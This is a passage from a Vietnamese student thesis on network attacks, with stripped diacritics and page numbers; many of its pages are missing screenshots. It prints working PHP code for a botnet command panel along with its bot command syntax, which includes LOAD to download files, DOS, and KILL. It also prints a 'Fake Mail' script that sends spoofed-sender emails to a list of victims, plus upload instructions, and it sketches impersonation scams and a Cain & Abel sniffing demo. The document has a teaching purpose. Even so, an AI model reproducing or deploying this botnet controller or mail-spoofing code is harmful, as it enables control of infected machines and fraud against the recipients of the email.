<title>Bang dieu khien cua BotNet</title>
</head>
<body style='color:#00FF00; background-color: black'>
<center>
<br>
<form action=# method=POST>
<input type=text name=cmd size=80>
<input type=submit value=Ok>
</form>
<br>
</body>
</html>
<?php
$cmd = $_POST['cmd'];
$fp = fopen('direc.txt', 'w');
fwrite($fp, $cmd);
fclose($fp);
echo $cmd;
?>
</center>
<br/>
<br/>
<br/>RUN@path_file<br/>
DEL@path_file<br/>
KILL@ten_Processe<br/>
LOAD@URL@PATH<br/>
DOS@LENH<br/>
MSGBOX@flag@title@text@timeout<br/>
-51-
<td>Subject :</td>
<td><input name="subject" type="text" />Tiu </td>
</tr>
<tr>
<td>Message :</td>
<td><textarea cols="30" rows="10" name="message">Ni dung</textarea></td>
</tr>
<tr>
<td></td>
<td><input type="submit" value="Send" /></td>
</tr>
</tbody></table>
</form>
Trang sendmail.php
<html>
<head>
<title>.:: Fake Mail :: doanchuyennganh.com :: nguyenanhduc.dtu@gmail.com
::.</title>
</head>
<body>
<?php
$emaillist=$_POST['emaillist'];
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
$from=$_POST['from'];
$name=$_POST['name'];
$subject=$_POST['subject'];
$message=$_POST['message'];
-53-
$message=$message;
$head="From: <$name>".$from."\r\n".
'Reply-To: '.$from."\r\n";
$her=$head.' < '.$from.' >';
$ret=mail($to, $subject, $message, $her);
}
if($ret==true)
echo "<br /> Mail sent Successfully";
else
echo "<br /> Unable to Send mail";
?>
<br><a href="/">Go Back</a>
</body>
</html>
Sau upload 2 trang trn ln host.Sau chy trang index.php ri thc hin facemail
Nhc im: hacker phi bit mail ca nn nhn.
2.6.2. Cc kiu la o khc
Cc kiu la o khc nh mo danh s in thoi m hin nay ai ai cng bit.Mo
danh gim c gi in cho th k,..Vi cch ny i hi hacker phi nm r chi tit
v nn nhn
2.7. Sniffer
2.7.1. Tm hiu tn cng kiu sniffer
Ph bin nht l cng c Cain & Abel . Cng c ny nghe ln rt mnh.Chng ta s tm
hiu sniffer thng qua cng c ny
-54-
Ethereal v0.10.14 .
EtherPeek v .
EffeTechHTTP Sniffer v .
Wireshack.
-55-
CHNG 3
DEMO
Sau y ti xin demo kiu tn cng Sniffer trong mng Lan.Dng phn mm
sniffer Cain & Abel v4.9.8 .Phn ci t Cain & Abel v4.9.8 ti s khng trnh by.
-56-
-57-
-58-
-59-
-60-
Trong bng trn cng bn phi, ta nhn chut vo trong bng hin ra Add to List (+)
Chn Add to List (+) .
-61-
-62-
-63-
-64-
KT LUN
1. Cc vn t c
Qua qu trnh thc hin n chuyn ngnh ln ny vn u tin m em t c
l c bn hiu c l cc nguyn l,phng php tn cng m chng ta thy hng
ngy trn mng v c bn cng hiu thm nhng phng php hn ch cc la hnh tn
cng ny.
T vic trin khai n chuyn ngnh ny gip em bit thm nhng kin thc v
bo mt thng tin trong mng quan trng ra sao v nm vng c kin thc v an
ton mng m em c hc t trc.
2. Hn ch
Trong qu trnh lm n c rt nhiu ti liu ti tm kim tuy c mc ch l
ging nhau song li c phng php khc nhau hon ton.Ti c gng
tm hiu thm v chng nhng khng khi c nhiu sai st
-65-
C. Ti liu internet:
[10]http://thuvienkhoahoc.com/wiki/K%C4%A9_thu%E1%BA%ADt_t%E1%BA
%A5n_c%C3%B4ng_CROSS-SITE_SCRIPTING
[11]http://vi.wikipedia.org/w/index.php?title=Th%E1%BB%83_lo%E1%BA%A1i:T
%E1%BA%A5n_c%C3%B4ng_t%E1%BB%AB_ch%E1%BB%91i_d%E1%BB
%8Bch_v%E1%BB%A5&action=edit&redlink=1
[12]http://www.hvaonline.net/hvaonline/posts/list/6720.hva;jsessionid=38F900726E07
641F712734A3B2A6F2EC
[13]http://www.ddcntt.vn/forum/showthread.php?t=14
-66-
[14]http://ttgtc.com/forum/showthread.php?1385-T%C3%ACm-hi%E1%BB%83u-v
%E1%BB%81-t%E1%BA%A5n-c%C3%B4ng-t%E1%BB%AB-ch%E1%BB%91i-d
%E1%BB%8Bch-v%E1%BB%A5-DoS&s=c580b874a6ea05d220258132c9cef9e3
[15]http://rootbiez.blogspot.com/2010/02/virus-botnet-va-cach-hoat-ong.html
[16]http://www.ictnews.vn/Home/bao-mat/Cau-noi-Quan-trimang/2SVCM99/trang0.htm
[17]http://harry.com.vn/read.php?33
[18]http://tailieuit.com/forum/thu-thuat-mang-bao-mat-437/cach-chmod-filemanagerhan-che-local-nen-doc-6082/?pagenumber=
[19]http://9xpro.biz/9x/showthread.php?3637-Ph%C6%B0%C6%A1ng-ph%C3%A1pch%E1%BB%91ng-local-attack-hi%E1%BB%83u-qu%E1%BA%A3-nh%E1%BA
%A5t&s=3ea1e2f1c729950584539c98ef865a8b
-67-
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
...................................................................................................................................
-70-